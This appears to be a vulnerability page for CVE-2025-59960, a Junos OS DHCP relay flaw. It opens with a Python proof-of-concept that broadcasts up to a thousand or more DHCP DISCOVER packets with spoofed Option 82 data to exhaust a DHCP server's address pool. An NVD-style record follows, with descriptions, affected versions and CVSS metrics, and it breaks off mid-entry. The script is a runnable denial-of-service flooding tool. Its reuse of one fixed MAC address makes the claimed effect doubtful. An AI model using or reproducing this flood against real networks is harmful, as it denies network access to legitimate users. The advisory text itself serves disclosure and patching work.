CVE-2025-59960

#!/usr/bin/env python3 # CVE-2025-59960 PoC - DHCP Address Pool Exhaustion # This PoC demonstrates sending malformed DHCP DISCOVER with Option 82 # to trigger address pool exhaustion on downstream DHCP server import socket import struct import random def create_dhcp_discover_with_option82(): """Create a DHCP DISCOVER packet with malicious Option 82""" # DHCP Message Type: Discover (1) # Hardware Type: Ethernet (1) # Hardware Address Length: 6 # Hops: 0 # Transaction ID: random 4 bytes xid = random.randint(0, 0xFFFFFFFF) # Create DHCP header packet = struct.pack('!4B', 1, # op: BOOTREQUEST 1, # htype: ETHERNET 6, # hlen: MAC address length 0 # hops ) packet += struct.pack('!I', xid) # Transaction ID packet += struct.pack('!HH', 0, 0) # Seconds elapsed, Flags packet += b'\x00' * 4 # Ciaddr (client IP) packet += b'\x00' * 4 # Yiaddr (your IP) packet += b'\x00' * 4 # Siaddr (server IP) packet += b'\x00' * 4 # Giaddr (relay IP) # MAC address (attacker) packet += b'\x00\x11\x22\x33\x44\x55' packet += b'\x00' * 202 # Padding for hardware address # Magic cookie packet += b'\x63\x82\x53\x63' # DHCP Options # Option 53: DHCP Message Type packet += struct.pack('!BB', 53, 1) # DHCP DISCOVER packet += struct.pack('!B', 1) # Option 82: Relay Agent Information (malicious) # Circuit ID and Remote ID can be manipulated packet += struct.pack('!BB', 82, 6) packet += struct.pack('!BB', 1, 4) # Circuit ID sub-option packet += b'\x00\x01\x02\x03' # Fake circuit ID packet += struct.pack('!BB', 2, 2) # Remote ID sub-option packet += b'\xAA\xBB' # Fake remote ID # Option 55: Parameter Request List packet += struct.pack('!BB', 55, 3) packet += struct.pack('!BBB', 1, 3, 6) # Option 255: End packet += struct.pack('!B', 255) return packet def send_dhcp_flood(target_broadcast='255.255.255.255', count=1000): """Send multiple DHCP DISCOVER packets to exhaust address pool""" sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) print(f"[*] Sending {count} malformed DHCP DISCOVER packets...") for i in range(count): packet = create_dhcp_discover_with_option82() try: sock.sendto(packet, (target_broadcast, 67)) if i % 100 == 0: print(f"[+] Sent {i} packets...") except Exception as e: print(f"[-] Error sending packet: {e}") sock.close() print("[*] Flooding complete") if __name__ == '__main__': import sys count = int(sys.argv[1]) if len(sys.argv) > 1 else 1000 send_dhcp_flood(count=count)

{"cve": {"id": "CVE-2025-59960", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:03.213", "lastModified": "2026-01-23T19:39:11.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Check for Unusual or Exceptional Conditions vulnerability in the Juniper DHCP service (jdhcpd) of Juniper Networks Junos OS and Junos OS Evolved allows a DHCP client in one subnet to exhaust the address pools of other subnets, leading to a Denial of Service (DoS) on the downstream DHCP server.\n\n\n\nBy default, the DHCP relay agent inserts its own Option 82 information when forwarding client requests, optionally replacing any Option 82 information provided by the client. When a specific DHCP DISCOVER is received in 'forward-only' mode with Option 82, the device should drop the message unless 'trust-option82' is configured. Instead, the DHCP relay forwards these packets to the DHCP server unmodified, which uses up addresses in the DHCP server's address pool, ultimately leading to address pool exhaustion.\n\nThis issue affects Junos OS: \n\n\n\n * all versions before 21.2R3-S10,\n * from 21.4 before 21.4R3-S12,\n * all versions of 22.2,\n * from 22.4 before 22.4R3-S8, \n * from 23.2 before 23.2R2-S5, \n * from 23.4 before 23.4R2-S6, \n * from 24.2 before 24.2R2-S2, \n * from 24.4 before 24.4R2, \n * from 25.2 before 25.2R1-S1, 25.2R2.\n\n\n\n\nJunos OS Evolved:\n\n\n\n * all versions before 21.4R3-S12-EVO, \n * all versions of 22.2-EVO,\n * from 22.4 before 22.4R3-S8-EVO, \n * from 23.2 before 23.2R2-S5-EVO, \n * from 23.4 before 23.4R2-S6-EVO, \n * from 24.2 before 24.2R2-S2-EVO, \n * from 24.4 before 24.4R2-EVO, \n * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO."}, {"lang": "es", "value": "Una vulnerabilidad de Comprobación Incorrecta de Condiciones Inusuales o Excepcionales en el servicio DHCP de Juniper (jdhcpd) de Juniper Networks Junos OS y Junos OS Evolved permite a un cliente DHCP en una subred agotar los grupos de direcciones de otras subredes, lo que lleva a una Denegación de Servicio (DoS) en el servidor DHCP descendente.\n\nPor defecto, el agente de retransmisión DHCP inserta su propia información de Opción 82 al reenviar solicitudes de cliente, reemplazando opcionalmente cualquier información de Opción 82 proporcionada por el cliente. Cuando se recibe un DHCP DISCOVER específico en modo 'solo reenvío' con Opción 82, el dispositivo debería descartar el mensaje a menos que 'trust-option82' esté configurado. En su lugar, el retransmisor DHCP reenvía estos paquetes al servidor DHCP sin modificar, lo que consume direcciones en el grupo de direcciones del servidor DHCP, lo que finalmente lleva al agotamiento del grupo de direcciones.\n\nEste problema afecta a Junos OS:\n\n * todas las versiones anteriores a 21.2R3-S10,\n * desde 21.4 anteriores a 21.4R3-S12,\n * todas las versiones de 22.2,\n * desde 22.4 anteriores a 22.4R3-S8,\n * desde 23.2 anteriores a 23.2R2-S5,\n * desde 23.4 anteriores a 23.4R2-S6,\n * desde 24.2 anteriores a 24.2R2-S2,\n * desde 24.4 anteriores a 24.4R2,\n * desde 25.2 anteriores a 25.2R1-S1, 25.2R2.\n\nJunos OS Evolved:\n\n * todas las versiones anteriores a 21.4R3-S12-EVO,\n * todas las versiones de 22.2-EVO,\n * desde 22.4 anteriores a 22.4R3-S8-EVO,\n * desde 23.2 anteriores a 23.2R2-S5-EVO,\n * desde 23.4 anteriores a 23.4R2-S6-EVO,\n * desde 24.2 anteriores a 24.2R2-S2-EVO,\n * desde 24.4 anteriores a 24.4R2-EVO,\n * desde 25.2 anteriores a 25.2R1-S1-EVO, 25.2R2-EVO."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:M/U:Amber", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recover ... (truncated)